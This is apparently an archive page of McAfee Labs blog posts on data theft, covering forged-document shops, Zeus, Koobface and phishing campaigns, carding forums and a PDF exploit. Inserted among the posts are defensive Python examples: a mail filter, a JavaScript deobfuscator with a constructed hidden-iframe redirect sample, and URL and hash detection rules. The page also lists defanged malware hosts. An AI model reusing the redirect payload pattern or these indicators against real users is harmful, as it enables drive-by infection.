Archive for the 'Data Theft' Category

How Much Does My Identity Cost? (the Sequel)

Two weeks ago, I posted a blog entry about the counterfeiting of legal documents. I have since received many comments and requests for further data from various Eastern European countries, France, and even the United States, related to this type of fraud. Aside from journalists, for whom it is their job, many people have contacted or attempted to contact me. Most of them were curious and friendly, but others flooded my mailbox:

The first request was for the URLs of the websites that provide these services. At McAfee, like most of our competitors, we almost never disclose dangerous URLs except to researchers in the business and to law enforcement agencies. In many cases we also do some internal testing to avoid infection or compromise. When I wrote my blog entry, that URL was safe (no malware, no iframe), but this can change, especially if its owners know it will be visited by MANY inquisitive people.

The next question was that of the counterfeiter’s nationality. No doubt they are Russian speakers.

Another request concerned the abundance of these offers. The site I visited actually contained a competitor blacklist with a dozen or so “disreputable” companies. As they were all restricted to driver’s licenses, I investigated the passport market further. It was not difficult to find other offers with MORE attractive prices: less than $1,000 instead of the $4,000 to $5,000 proposed by the first one.

In this last offer, I noted the availability of Diplomatic passports (price on demand).

If you are not a Google search ninja, you can just check YouTube. There, various well-phrased searches can direct you to the online shop you are looking for:

And the payment methods? They all seem to prefer Western Union, but they are not very talkative on this subject, as you first have to contact them via anonymous mailing services (they specify: “no ICQ, no SMS, no phone call”). However, I discovered another offer with details about how to place an order.

Finally, some people wished to know whether these sites offered other materials or services. Some of them do sell carding equipment to read/write magnetic cards, but the prices were exorbitant: they quoted between $9,000 and $11,000 when many of these devices can be found on Amazon or eBay for $500! Most interesting, and proof of the relevance of our previous advice about what you toss into your household trash, one site offers fake French EDF (national electricity company) and British Telecom utility bills for £10. In Europe, these documents are frequently used as proof of residency or address.

Even the envelope is supplied! The least important pieces of paper can interest today’s cybercriminal!

Zeus Botnet Attacks via FedEx Scam

Yesterday we discovered a new Zeus campaign.

Most of the messages associated with the new spam campaign are linked to the Asprox botnet. This time, the focus is on FedEx. Most of the attachments start with either FedExDoc[randomnumbers].exe or FedExInvoice[randomnumbers].exe. Those attachments are recognized as the Bredolab Trojan, which will download the Zeus component.

This Zeus variant has a control host on hxxp://x5vsm5.ru, but also downloads from hxxp://trachsel.biz.

The targets of these samples are a large number of banks outside the United States. We still see common U.S. targets…

  • Citibank
  • Comerica
  • USBank
  • WellsFargo

and also some banks from Europe, the Middle East, Asia, and South America…

  • Neue Bank (Liechtenstein)
  • Arab Bank
  • MyBank (Taiwan)
  • BHI Bank (United Kingdom)
  • NPBS (United Kingdom)
  • Banco de Sabadell (Spain)

as well as several other banks.

Watch out for Zeus’ going global.

Labs Releases Whitepaper on Cooperative Anti-Malware on Endpoint and Gateway

The Anti-Malware engine is a critical and core piece of the McAfee anti-malware solutions. As with any core technology, the engine must be rock-solid stable, fast, and functionally rich.

A new McAfee Labs whitepaper outlines these engine technologies and values, covering both endpoint and gateway uses. Beyond introductions to malware detection methodologies–ranging from exact detection to heuristics, and technologies from exploit detection to cloud-based detection, the new paper especially outlines McAfee’s approach to Cooperative Anti-Malware on Endpoint and Gateway. “Cooperative” in this case refers to the added value of combining anti-malware on the endpoint and on the gateway: a true defense-in-depth strategy in action.

In this defense-in-depth implementation we have engine technologies that are optimized for the endpoint and the gateway, respectively, and both are connected through our Global Threat Intelligence back-end, or “cloud.” This combination allows strict enforcement and the highest proactive catch rates at the network perimeter, keeping the majority of threats outside of your network, and effectively and accurately protecting the desktops in an enterprise as well.

Download and read it now!

Three Strikes to Latest Phishing Scam

We unceasingly monitor and combat old and emerging web threats, taking different approaches to best protect our customers. Cybercriminals continuously look for new ways to steal valuable information. A recent phishing scam we’ve seen uses three familiar lures: PayPal, Bank of America, and a free offer to check your credit score.

The recent attack on Bank of America users is arriving as spam email with a phishing link alerting users about an “account deactivation.” The scam claims online banking security regulations require users to click on the provided URL. Don’t fall for this tactic. Clicking the link “RESOLVE” redirects you to a malicious site.

Phishing 1

A similar situation occurs with the scam claiming a “security problem” with your PayPal account. The link redirects victims to a fake page hosted at the root of the phishing domain. These malicious pages reuse the same graphics, style sheets, and links as the genuine pages.

Phishing 2

Would you trust an unsolicited email that offers to check your credit score for free? It looks authentic, but definitely is not. It is always much safer to type the web address you want to visit manually instead of clicking a link from a suspicious email. If you receive one of these emails, do not click on the links. Users without protection who click on these links may infect their computers or reveal their data.

Phishing 3

Remember to keep your anti-virus software up to date, and do not provide any personal or financial information to unsolicited email messages. Last year 11.1 million people were victims of identity theft in the United States; an identity is stolen every three seconds. Cybercriminals aggressively pursue unprotected users. Learn how to prevent identity theft at our McAfee Identity Protection page.

How Much Does My Identity Cost?

Phishing and identity theft involve not only the theft of funds. In addition to financial data, information collected by cybercriminals also can allow them to create and sell false legal documents.

On top of selling malware, renting botnets, or launching denial-of-service attacks, supplying falsified documents is another well-paid online activity. I visited such a business just yesterday.

One popular document for criminals is a passport. The following website offers a large choice classified by country. The lowest price (US$870) is for Azerbaijan; a French passport costs US$5,530. A customer must send the forgers personal information as well as a signature and a photo, and they take care of the rest.

The site also offers a large collection of credit cards (sold 10 at a time) with balances ranging from US$2,000 to US$15,000. Some Platinum cards are guaranteed up to US$50,000.

After money and passport, a criminal might next need a driver’s license. No problem, they can find those here:

To attract customers, the document providers offer specifics for some countries and states. These examples describe Russia and Michigan in the United States:

To make these documents criminals need not only the financial data they can obtain via the usual phishing strategies; they also need more personal data. To get it, they target online and offline locations where this information is available. To protect yourself, you need to remain aware of what you give away on your social networking platform as well as what you toss into your household trash.

Fraud Strikes U.S. Travel Authorization Agency

Last year, the U.S. government passed a law making online travel registration mandatory for all citizens of countries eligible for the Visa Waiver Program. The program covers most European Union member states, as well as other countries such as Switzerland, Japan, South Korea, and Singapore.

The registration has to be made at least 72 hours before traveling to the United States. It can be made only through an online form, the Electronic System for Travel Authorization (ESTA), available on the official Department of Homeland Security website at https://esta.cbp.dhs.gov. Registration is currently free. Once a traveler registers, the authorization remains valid for two years, regardless of the number of trips to the United States.

Under the Travel Promotion Act, from September 8, 2010, onward all visitors using the Visa Waiver Program will be charged US$14 to complete this immigration form. Of this fee, $10 will fund international campaigns promoting travel and tourism in the United States; the other $4 is an administration fee.

We weren’t surprised that some people soon figured out how to make money from this, especially as the application and payment by credit card must be made online. We’ve seen similar fraud in relation to green card application scams in the past. McAfee Labs research has shown that both types of fraud are related, and it is likely that the ESTA fee scam is run by the same organizations as the green card scammers.

McAfee has also noticed that most search results for “ESTA,” “ESTA form,” or “ESTA online registration” lead to fraudulent websites, especially if the search terms are run in non-English languages. Even worse: Most sponsored ads are leading to fraudulent websites, too.

Examining these sites, we found three common types of fraud. The first offers a basic service that fills out the form on the applicant’s behalf, for an extra $30 to $250. These services are comparatively harmless, because users probably still get their online registration. The main risk is the loss of personal information to third parties, which may result in spam or other unwanted contact. In the worst case, handing over travel dates could invite burglary, as applicants provide their home address along with the dates their home will be unoccupied.

More dangerous are sites set up primarily to gather personal information. This kind of phishing is worse than common banking phishing: rather than banking or credit card details, users are asked for their date of birth, passport number, contact address, and other personal data, plus the answers to the questions that are mandatory for U.S. immigration, such as medical conditions, criminal records, or involvement in espionage or war crimes. These sites are even built to capture the details of traveling family members as well.

The third type of fraudulent sites related to the ESTA registration offer application guides or forms for download. These download forms are simply malware. It is essential you not download anything from these sites. The ESTA form is a web-based application; no forms need to be downloaded.

What these sites have in common is that they mimic official government websites. Some are even available in other languages such as Japanese, German, or French; one ESTA phishing site we examined is available in 12 languages. They simulate authenticity by using official-looking icons or a “safe” government link somewhere on the page. Some include a long section of privacy and terms-of-service disclaimers. Ironically, they warn users to beware of fraudulent websites that steal private information or overcharge for their services:

    Warning! Applying through a third party website may not comply with ESTA regulations. Beware of fraudulent websites that collect your private information and claim to submit the application on your behalf. Applying for your own Travel Authorization is the only way to be 100% sure that your application was submitted properly. Travelers with an invalid ESTA Travel Authorization will be denied entry by U.S. Customs and Border Protection. Download the Application Guide below and submit your own ESTA application today.

In summary, online registration is available only at the official Department of Homeland Security site, https://esta.cbp.dhs.gov. This government website gives you all the important information and is available in all 22 languages of the countries that qualify for the Visa Waiver Program. There is no need to use a third-party service for this immigration form. Every other site offering such a service is a scam: charging extra, stealing personal information, or simply spreading malware.

Prolific Carder Arrested in France

On August 7, the French border police (Police aux Frontières) arrested Vladislav Anatolievich Horohorin at Nice airport as he attempted to board a flight to Moscow. The 27-year-old, a citizen of both Israel and Ukraine, reportedly lived on the French Riviera. At the time of the arrest, authorities said, he was carrying casino-issued cards that grant high rollers additional privileges. He is now being held in France pending extradition to the United States.

In security circles, Horohorin was known as BadB. He introduced himself as one of the biggest “dump” vendors, selling stolen credit card information since the days of CarderPlanet.

Apart from his association with carder websites such as CarderPlanet or carder.su, BadB managed his own websites. He advertised the availability of stolen credit card information through his web forums, and he directed purchasers to create accounts on his sites. The next screenshot shows one of his websites in 2007.

AOL News, citing the indictment, gives some details of Horohorin’s activities. On May 15, 2009, a Secret Service agent contacted BadB and purchased credit card dumps; Visa subsequently verified most of them as authentic. In July 2009, Secret Service agents observed BadB selling dumps from a variety of banks around the world. This time, while communicating over the Internet, BadB said he no longer accepted funds through Western Union and that purchases had to be made through WebMoney. Using that electronic payment system, the authorities bought further credit card dumps.

In November 2009, a federal grand jury in Washington indicted Horohorin on charges of access-device fraud and aggravated identity theft. This indictment remained sealed while authorities tried to hunt him down.

Today, the BadB websites are still online.

One of these sites welcomes visitors with a cartoon showing the Russian Prime Minister, Vladimir Putin, awarding gold medals to cybercriminals.

Horohorin faces a maximum penalty of 10 years in prison and a US$250,000 fine on the count of access-device fraud. He has also been charged with one count of aggravated identity theft, which carries a mandatory two-year prison term served consecutively and a fine of up to US$250,000.

McAfee Quarterly Threats Report Released

Malware has reached its highest levels, making the first six months of 2010 the most active half-year ever for total malware production. At the same time, spam leveled out, with only 2.5 percent growth from last quarter.

Malware continued to soar in the second quarter, with 10 million new samples cataloged in the first half of this year. Consistent with last quarter, threats on portable storage devices took the lead as the most prevalent malware, followed by fake anti-virus software and social media malware. With approximately 55,000 new pieces of malware appearing every day, AutoRun malware and password-stealing Trojans are the top two threats globally.

“Our latest threat report depicts that malware has been on a steady incline in the first half of 2010,” said Mike Gallagher, senior vice president and chief technology officer of Global Threat Intelligence for McAfee. “It’s also obvious that cybercriminals are becoming more in tune with what the general public is passionate about from a technology perspective and using it to lure unsuspecting victims. These findings indicate that not only should cybercrime education be more widespread, but that security organizations should move from a reactive to a predictive security strategy.”

After reaching its highest point in the third quarter last year, with nearly 175 billion messages per day, spam rates have hit a plateau. Cybercriminals took advantage of the hype surrounding the FIFA World Cup in South Africa, and used various methods to promote scams and search-engine “poisoning.” Globally, the most popular types of spam varied from country to country with some interesting findings. For instance, delivery status notifications, or nondelivery-receipt spam, were the most popular in United States, Italy, Spain, China, Great Britain, Brazil, Germany, and Australia. Malware spam, or anything that comes with a virus or Trojan attachment urging you to visit an infected website, was the most popular in Colombia, India, South Korea, Russia, and Vietnam. Argentina had the most variety in spam, with 16 topic areas, ranging from drugs to “lonely women” to diplomas. Italy came in with the least variety, with just six types of widely popular spam.

Attackers leveraged major events such as the World Cup and Middle East conflicts to poison Internet searches, although the BP oil spill in the Gulf of Mexico was surprisingly absent from the Top 20 toxic search terms. McAfee Labs also saw a resurrection of two “dead” botnets: Storm Worm and Kraken, once considered to be among the biggest botnets on the planet, are again on the rise.

For a full copy of the McAfee Threats Report, Second Quarter in nine languages, please visit: http://www.mcafee.com/us/threat_center/white_paper.html

Remote iPhone Jailbreak Using PDF Exploit Should Serve as Wake-Up Call

Like many iPhone users, I “jailbreak” my iPhone. I do this for many reasons, but mainly for console-level access and the darn cool infosec tools that are available through Cydia. Like many iPhone users, I was quite happy when the Electronic Frontier Foundation (EFF) was able to get jailbreaking included under “fair use” within the Digital Millennium Copyright Act. Like many iPhone users, I was also very happy to learn that Dev-Team would soon make remote jailbreaking possible by simply visiting their jailbreakme website. Alas my happiness was not to last.

While still at Defcon, I saw through Twitter that one exploit or another was being used to remotely jailbreak the iPhone. (I believe the first tweets I saw were from Brian Krebs.) I then saw posts from VUPEN that several flaws were being exploited. From their advisory:

Technical Description

Two vulnerabilities have been identified in Apple iOS for iPhone, iPad and iPod, which could be exploited by remote attackers to take complete control of a vulnerable device.

The first issue is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari.

The second vulnerability is caused by an error in the kernel, which could allow attackers to gain elevated privileges and bypass sandbox restrictions.

Note: These flaws are currently being exploited by jailbreakme to remotely jailbreak Apple devices.

Affected Products

Apple iPhone OS (iOS) versions 4.x
Apple iPhone OS (iOS) versions 3.x
Apple iPod OS (iOS) versions 4.x
Apple iPod OS (iOS) versions 3.x
Apple iPad OS (iOS) versions 3.x

Solution

VUPEN Security is not aware of any vendor-supplied patch.

References

http://www.vupen.com/english/advisories/2010/1992

Did you notice the line “VUPEN is not aware of any vendor-supplied patch”? In the security business we call those zero-day vulnerabilities. We call code that takes advantage of zero-day vulnerabilities zero-day exploits. (I have not seen confirmation from Apple that these are in fact zero-day vulnerabilities, so keep that in mind).

I hope I am not the only one bothered by this, because it raises the question “What else can this be used for?” Vulnerabilities with reliable exploit code tend to get reused and repurposed for other attacks and malware. Just look at the .LNK vulnerability that Microsoft fixed yesterday via an out-of-band patch: it first appeared in the Stuxnet worm, which targeted power-plant control systems, and then turned up in more mainstream malware, because it was an unpatched vulnerability with working exploit code. Read this article in The Register for a real nice breakdown of it.

This should serve as a wake-up call for anyone with a mobile device: Remote exploitation is real and here to stay. For now these vulnerabilities are being used only (as far as we know) to jailbreak iPhones, but they could be used to do many other things to iPhones and their owners around the world.

Beware Bogus ‘Trial’ Version of VirusScan

First of all, this is not a sales pitch. :)

McAfee offers several of its products for a trial period. However, we want you to know that we have just found a brand new variant of the Bredolab Trojan that is spreading by email with the following characteristics:

Subject: “McAfee VirusScan Plus”
Message body: “Download a FREE 30-day Trial of MCAfee VirusScan Plus and Be Automaticaly Entered to Win.
Installation file attached”

If you are suspicious of misspellings in emails, you might have noticed that both “MCAfee” and “Automaticaly” are not correct. Another point is the attachment–we don’t send setup files for our products as email attachments! As you may have guessed by this point, the attachment is the Bredolab Trojan.

If you do want our trial version, you can find it here: http://www.mcafee.com/us/downloads/index.html
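As an added example that is not part of the original posts or McAfee’s tooling, the Python script below shows the mail-gateway check that would catch both the FedEx/Zeus lure described earlier on this page and this bogus VirusScan “trial” mail. It parses a raw message with the standard library, lists attachment filenames, and flags executable attachments, filenames matching the FedExDoc/FedExInvoice naming, and the known lure subject. The sample messages are constructed here; the regular expression generalises the “[randomnumbers]” placeholder in the post and is an assumption.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Attachment names from the FedEx campaign: FedExDoc[randomnumbers].exe and
# FedExInvoice[randomnumbers].exe. The digit run is an assumption about "[randomnumbers]".
LURE_NAME_PATTERNS = [re.compile(r"^FedEx(?:Doc|Invoice)\d+\.exe$", re.IGNORECASE)]
# Subject line of the bogus VirusScan "trial" mail, compared case-insensitively.
LURE_SUBJECTS = {"mcafee virusscan plus"}
# Extensions that a mail gateway should never deliver as attachments.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd"}


def attachment_names(msg):
    """Return the filenames of every non-multipart part that declares one."""
    names = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()
        if name:
            names.append(name)
    return names


def triage_message(raw_bytes):
    """Parse a raw RFC 822 message and return (verdict, findings)."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    subject = (msg.get("Subject") or "").strip()
    if subject.lower() in LURE_SUBJECTS:
        findings.append(f"known lure subject: {subject!r}")
    for name in attachment_names(msg):
        # Look only at the final extension, so invoice.pdf.exe is still caught.
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext in EXECUTABLE_EXTS:
            findings.append(f"executable attachment: {name}")
        if any(p.match(name) for p in LURE_NAME_PATTERNS):
            findings.append(f"attachment name matches FedEx lure: {name}")
    return ("quarantine" if findings else "deliver"), findings


def build_sample(subject, body, filename=None):
    """Constructed test message; the attachment is a fake MZ stub, not real malware."""
    m = EmailMessage()
    m["From"] = "sender@example.net"
    m["To"] = "user@example.com"
    m["Subject"] = subject
    m.set_content(body)
    if filename:
        m.add_attachment(b"MZ\x90\x00" + b"\x00" * 16, maintype="application",
                         subtype="octet-stream", filename=filename)
    return m.as_bytes()


if __name__ == "__main__":
    for subj, body, fn in [
        ("Your FedEx invoice", "See attached document.", "FedExInvoice48213.exe"),
        ("McAfee VirusScan Plus", "Installation file attached", "setup.exe"),
        ("Lunch on Friday?", "Noon works for me.", None),
    ]:
        print(subj, "->", triage_message(build_sample(subj, body, fn)))
```

The executable-extension rule does the heavy lifting; the name and subject patterns only add a label for the known campaign, so the rule keeps working when the next lure uses a different courier or product name.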

More Koobface URLs Plague Users

McAfee Labs researchers have seen a noticeable spike in URLs leading to Koobface malware. (Koobface is an anagram of Facebook.) The latest, unexpected Koobface campaign spreads by tricking Facebook users into following links and running the downloaded file. The links share this format:

URL format: <Domain/variable/setup.exe>

Koobface 1

All of these URLs served the same file, MD5 9cac65b88d2288fb16f8a356c3563604.

Koobface 2

Since its first appearance in 2008, Koobface has resurfaced intermittently in multiple variants that spread rapidly through the popular social networking site. The lure is usually a video clip: users are prompted to install a new version of Adobe Flash Player, but the “upgrade” is actually a copy of the Koobface worm. Koobface also downloads itself under a mixture of file names and paths, such as Domain/variable/Flash__Player.exe or Domain/view/console=yes/setup.exe.

Koobface sends false messages and comments to the victim’s friends, redirects them to a malicious website, and tries to steal log-in credentials to spread itself. In some cases after the worm downloads and local files are modified, victims cannot run most programs. Watch this space for more information and further details of Koobface hijacking in a blog by my colleague Craig Schmugar. [Update: You'll find that blog here.]

Don’t open messages or click on links from sources that you do not trust. Here’s an example of how McAfee SiteAdvisor technology and the McAfee TrustedSource™ reputation system protect users and make their browsing safer.

Koobface 3

Social Networking Threats: New Report From McAfee Labs

Social networking sites and technologies are among the hottest happenings on the Internet. However, every benefit comes with an equal danger: these sites and technologies are also huge targets for cybercriminals. One of McAfee Labs’ senior researchers, Anthony Bettini, has written an excellent whitepaper on the subject. Social Networking Apps Pose Surprising Security Challenges details some of these areas of concern. I’ll let Tony tell the story:

    Facebook, Twitter, MySpace, and LinkedIn—oh my! If we’re not using these services ourselves or hearing about them in the media, our friends, colleagues, and children remind us each day of their existence. Although Web 2.0 may be a buzzword we all love to hate, media-rich web applications that allow information sharing among users are here to stay and growing in popularity. An article written in October 2009 (so it’s clearly out of date) on the size of Facebook’s data center states Facebook stores approximately 80 billion photos and serves up approximately 600,000 photos per second—making it the largest photo archive in the world.1 Social networking web applications such as Facebook are a big deal.

    As social networking gains users, it will increasingly be targeted by attackers, just as instant messaging and other media have been. For an interesting view on how platform prevalence draws attackers like bees to pollen, see the IEEE article “When Malware Attacks (Anything but Windows).” One popular technology ripe for exploitation in social network applications is the “mashup.” (Wikipedia: “A mashup is a web page or application that uses or combines data or functionality from two or many more external sources to create a new service.”) From the perspective of an application provider such as Google, mashups allow their applications—for example, Google Maps—to become more widely used and embedded within other new applications, like Yelp or the iPhone operating system. However, as we’ll soon see, attackers have also been using mashups to their advantage.

Download and share this excellent paper with all the people you know who use social networking sites and technologies. The dangers are real–but with education, action, and proper security we can successfully manage them.

Fake Resume Spam Leads to Malware Infection

We just noticed a new wave of fake resume spam that redirects users to a malicious site. The resume pages were uploaded to legitimate sites under the top-level domains of various countries, perhaps in an attempt to internationalize the spam campaign.

URLs

The pages contain a small piece of obfuscated JavaScript code that translates into a malicious URL when decoded.

JS 1

JS 2
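The post shows the obfuscated script only as screenshots, so as an added example (not code from the post or from the campaign) here is how an analyst decodes this kind of landing-page JavaScript statically, without ever executing it: the script below folds String.fromCharCode(...) lists, unescape('%XX...') calls, \xHH and \uHHHH escapes and adjacent string concatenations until nothing changes, then pulls any URL out of the result. The sample script and the domain malware-example.invalid in it are constructed for the demonstration.

```python
import json
import re
from urllib.parse import unquote

# Common obfuscation primitives seen in injected landing pages.
FROMCHARCODE = re.compile(r"String\.fromCharCode\s*\(\s*([0-9xXa-fA-F,\s]+)\)")
UNESCAPE = re.compile(r"unescape\s*\(\s*(['\"])(.*?)\1\s*\)", re.S)
HEX_ESC = re.compile(r"\\x([0-9a-fA-F]{2})")
UNI_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")
CONCAT_DQ = re.compile(r'"((?:[^"\\]|\\.)*)"\s*\+\s*"((?:[^"\\]|\\.)*)"')
CONCAT_SQ = re.compile(r"'((?:[^'\\]|\\.)*)'\s*\+\s*'((?:[^'\\]|\\.)*)'")
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>]*)?")


def _fromcharcode(m):
    codes = []
    for tok in m.group(1).split(","):
        tok = tok.strip()
        if tok:
            codes.append(int(tok, 16) if tok.lower().startswith("0x") else int(tok))
    return json.dumps("".join(chr(c) for c in codes))  # emit a JS string literal


def _unescape(m):
    return json.dumps(unquote(m.group(2)))


def decode_js(src, max_rounds=10):
    """Rewrite the script until no obfuscation primitive matches any more.

    Escapes are decoded everywhere, not only inside string literals, which is
    acceptable for triage but not for producing runnable JavaScript.
    """
    text = src
    for _ in range(max_rounds):
        before = text
        text = FROMCHARCODE.sub(_fromcharcode, text)
        text = UNESCAPE.sub(_unescape, text)
        text = HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = UNI_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = CONCAT_DQ.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        text = CONCAT_SQ.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if text == before:
            break
    return text


def extract_urls(src):
    """Decode the script and return the distinct URLs it builds."""
    return sorted(set(URL_RE.findall(decode_js(src))))


# Constructed sample in the style of an injected resume page; the domain is fictitious.
SAMPLE_JS = r"""
var u = unescape('%68%74%74%70%3A%2F%2F') + String.fromCharCode(109,97,108,119,97,114,101,45,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100) + "\x2f\x72\x65\x73\x75\x6d\x65\x2e\x70\x68\x70";
document.write('<iframe src="' + u + '" width="1" height="1"></iframe>');
"""

if __name__ == "__main__":
    print(decode_js(SAMPLE_JS))
    print(extract_urls(SAMPLE_JS))
```

Variables are not evaluated (the iframe’s src stays as `u`), which is deliberate: the goal is to recover indicators such as the redirect URL for blocking and pivoting, not to reproduce the page’s behaviour. Anything this pass cannot fold is a cue to run the script in an instrumented sandbox instead.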

This malicious domain is also related to other domains that were used in a fake YouTube malware campaign and a Zeus control server. So keep this in mind next time you click on that $100k job offer or suspicious job application from an anonymous sender. McAfee SiteAdvisor technology can help protect users from these kinds of threats.

SiteAdvisor

New Clothes for ‘Canadian Pharmacy’ Spam

It has been a little while since we heard something new from the pharmacy spam corner, but right on time at the end of Q2, they are back–and with reinforcements!

Our researchers have found an enormous number of spam URLs, all related to a pair of well-known malicious IP ranges: 194.xx.xx.x2 and 194.xx.xx.x4.

The first range alone yields a repertoire of almost 200 similar-sounding URLs built from words such as erect, drugs, med, pharm, or pill. They appear, of course, in various combinations with alphanumeric prefixes and suffixes, for example hxxp://33a2.xxxxxxxxxxxx71a.xx or hxxp://drugsxxyyzz.xx.

Although these sites use the “Canadian pharmacy” spam terminology, their TLDs are mostly Russian and Ukrainian.

The start pages all appear in the familiar design of the previously mentioned “Canadian Pharmacy Group,” but this time with different persons smiling at us.

Canadian Pharmacy

Canadian Pharmacy 2

Even though these sites have had a design refresh, they follow the same fraud patterns and goals as all pharmacy spam. Keep in mind that hundreds (or more) of new URLs appear every day, so if you land on one of these sites, handle it with great caution. Look for any sign of “Canadian pharmacy” branding combined with a foreign country-code TLD; if you find one, leave as fast as possible. Don’t get lured into one of their offers, or you may soon need more than pills for your headache: data theft or identity theft may follow.
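The Koobface post earlier on this page describes download URLs by their path shape (Domain/variable/setup.exe, Domain/variable/Flash__Player.exe, Domain/view/console=yes/setup.exe) and by the MD5 of the served file, and this post describes pharmacy hosts by their vocabulary and their Russian or Ukrainian TLDs. As an added example, not McAfee’s code or any product logic, the Python below turns both descriptions into a proxy-log classifier plus a hash check. The log lines and hostnames are constructed; the MD5 in KNOWN_MD5 is the one quoted in the Koobface post, and the choice of “ru” and “ua” as the TLD set is an assumption drawn from the post’s wording.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Koobface download paths from the post: /<variable>/setup.exe,
# /<variable>/Flash__Player.exe and /view/console=yes/setup.exe.
KOOBFACE_PATHS = [
    re.compile(r"^/[^/]+/(?:setup|Flash__Player)\.exe$"),
    re.compile(r"^/view/console=yes/setup\.exe$"),
]
# Pharmacy-spam vocabulary from the post, and the TLDs it was seen on (assumption).
PHARMA_WORDS = ("erect", "drugs", "med", "pharm", "pill")
PHARMA_TLDS = {"ru", "ua"}
# MD5 of the Koobface binary named in the post.
KNOWN_MD5 = {"9cac65b88d2288fb16f8a356c3563604": "Koobface"}


def classify_url(url):
    """Return a list of heuristic tags for one URL (empty list = nothing matched)."""
    tags = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    if any(p.match(path) for p in KOOBFACE_PATHS):
        tags.append("koobface-download-path")
    tld = host.rsplit(".", 1)[-1] if "." in host else ""
    words = [w for w in PHARMA_WORDS if w in host]
    if words and tld in PHARMA_TLDS:
        tags.append("pharmacy-spam-host:" + "+".join(words))
    return tags


def scan_proxy_log(text):
    """Parse 'timestamp client method url' lines and return (client, url, tags) hits."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        _ts, client, _method, url = fields[:4]
        tags = classify_url(url)
        if tags:
            hits.append((client, url, tags))
    return hits


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def payload_verdict(data, known=KNOWN_MD5):
    """Name the sample if its MD5 is on the known list, else None."""
    return known.get(md5_hex(data))


# Constructed proxy log; hosts use reserved or made-up names.
SAMPLE_PROXY_LOG = """\
2010-08-10T09:12:01Z 10.0.0.17 GET http://video-share.example/xf8q2/setup.exe
2010-08-10T09:12:05Z 10.0.0.17 GET http://video-share.example/view/console=yes/setup.exe
2010-08-10T09:13:40Z 10.0.0.23 GET http://33a2.drugspillmed71a.ru/
2010-08-10T09:14:02Z 10.0.0.23 GET https://www.example.com/news/index.html
2010-08-10T09:15:00Z 10.0.0.31 GET http://cdn.example.org/k3/Flash__Player.exe
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

The path rule is intentionally loose (any /something/setup.exe matches), so treat it as a trigger to pull the downloaded body and hash it, not as a verdict on its own; the hash match is what confirms the Koobface sample the post names. Substring matching on “med” will also hit words like “media”, which is why the TLD condition is required as well.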

Inside the Carding Underworld

Carder.cc is a German online forum dedicated to trading stolen credit card and login details obtained through carding or phishing. Because such forums are a source of income for their administrators (who are themselves involved in this black market), the best-known forums are forever engaged in underground infighting to stay on top. If a competitor can demonstrate that another forum is insecure, it can win market share.

That is the likely reason some individuals hacked the carder.cc forum and posted the results on a public file-sharing network, including information about thousands of forum members and, in many cases, their passwords.

Perhaps the most interesting exposed file is a RAR archive containing a dump of the forum and a tool that lets the curious reconstitute the site and browse it with administrator rights.

First of all, we find data about the four administrators, their emails, and when they joined the group:

Following the link, we see the IP for each member (a real or fake IP, depending on the use of an anonymizer) and the function title (KRON0S is the “God of Carders”; Zagerus is “Techadmin”).

Besides the four administrators, by browsing the member list we find:

  • 4121 simple members
  • 5 global moderators
  • 258 second-level members
  • 7 third-level members
  • 4 moderators
  • 17 verified vendors
  • 497 banned members

Age, nationality, and other personal data are sometimes mentioned. Websites, ICQ, AOL Messenger, Yahoo Messenger, and MSN contacts are also noted. No doubt these data will interest law enforcement agencies in their inquiries.

Most of the offers available in the various forum areas are linked to standard carding and botnet businesses. Some, however, were less common: I noted a Second Life account with 65,000 Linden dollars (about US$60), some $50 iTunes gift cards ($20 each), and a forged-papers factory (about $1,000 for each falsified document).

Visiting this forum shows that the identity theft market is thriving. The number of free payment accounts that include the full identity of each victim, offered here to attract customer interest, is proof enough. I searched for French victims; the next screenshot gives only a brief outline.

Italian Phishing Scam Targets Customers of CartaSi

Spam never ceases to amaze me. The latest phishing scam I’ve seen has spammers impersonating CartaSi, the Italian payment-card company. The message subject is “Effettuare l’aggiornamento dei dati”, roughly “Carry out the data update”. The email even carries an introduction that educates users about phishing on the web, and the scammers provide a fake “secure link” supposedly telling CartaSi users how to avoid online banking problems.

The e-mail scam starts here:

Once victims click “Accedi a collegamento sicuro” (“access secure link”), they are redirected to an IP address of the form 96.X.XX.X0 that serves a phishing clone of the genuine cartasi.it page. Some of the Italian wording and grammar is incorrect, so Italian readers should immediately be suspicious.

Users without protection who click on any of these links could infect their systems, resulting in stolen personal or financial credentials. Regardless of what language you speak or where you do your browsing, make sure you are safe.

Here is an example of how McAfee technology protects users from malicious phishing attacks.

Waka Waka FIFA 2010: Targeted PDF Attack Uses World Cup as Bait

Malware authors have long taken advantage of high-profile incidents and trends to infect naive Internet users. Historically, we have come across innumerable cases in which events such as Michael Jackson’s death or the Benazir Bhutto assassination served as an avenue to spread malware.

We have seen instances from recent times where FIFA World Cup themes have been extensively used as bait to lure unsuspecting users into opening malicious attachments. With lots of recently discovered vulnerabilities and widespread distribution, PDF files are a perfect vector for these kinds of attacks. These threats can be delivered as emails or poisoned search-engine results leading to malicious PDFs.

This particular PDF file is directed at certain high-profile targets. Upon executing the malicious PDF file on a vulnerable version of Adobe Reader or Acrobat, it drops an innocent PDF file as shown in the figure below to spoof the unsuspecting user.

This PDF exploits a vulnerability in the way Adobe Acrobat and Reader handle TIFF files and affects all versions 9.3 and earlier.

